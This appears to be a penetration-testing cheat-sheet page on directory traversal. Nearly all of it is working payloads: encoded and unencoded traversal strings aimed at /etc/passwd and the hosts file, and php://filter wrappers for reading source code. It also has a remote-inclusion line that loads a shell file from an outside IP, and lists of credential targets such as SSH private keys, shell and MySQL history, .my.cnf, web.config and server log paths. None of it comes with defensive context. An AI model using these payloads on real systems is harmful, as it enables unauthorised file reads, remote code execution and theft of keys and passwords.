Directory Traversal

  1. View users on machine

  2. Search for SSH Keys

  3. Search for passwords in log or configuration files (.htaccess, config.php)

../../../../../../../../../etc/passwd
../../../../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts
\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts
php://filter/resource=/etc/passwd
php://filter/convert.base64-encode/resource=about.html
php://filter/read=string.rot13/resource=index.php
index.php?page=http://10.10.14.10/shell.txt

Port knocking ; trigger ports to open from executing port knocking file

/etc/knockd.conf

SSH

SSH keys are also stored under C:\Users\user\.ssh

id_rsa
id_ecdsa
id_ecdsa_sk
id_ed25519
id_ed25519_sk
id_dsa
authorized_keys
id_rsa.keystore
id_rsa.pub
known_hosts

HTTPD, Apache2, Nginx

/var/log/apache/access.log 
/var/log/apache2/access.log 
/var/log/apache/access_log 
/var/log/apache2/access_log
/var/log/access_log
/var/log/nginx/access.log 
/var/log/nginx/access_log 
/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access. log 
/opt/apache2/logs/access_log
/opt/apache2/logs/access.log
/opt/apache/logs/access_log
/opt/apache/logs/access.log

IIS

C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config

Linux user specific

.bash_history
.mysql_history
.my.cnf

Windows

c:\apache\php\php.ini 
c:\xampp\apache\bin\php.ini  
c:\xampp\apache\logs\access.log
c:\Program Files\Apache Group\Apache\conf\httpd.conf  
c:\Program Files\Apache Group\Apache2\conf\httpd.conf  
c:\Program Files\xampp\apache\conf\httpd.conf
PreviousFile UploadNextLFI & RFI

Last updated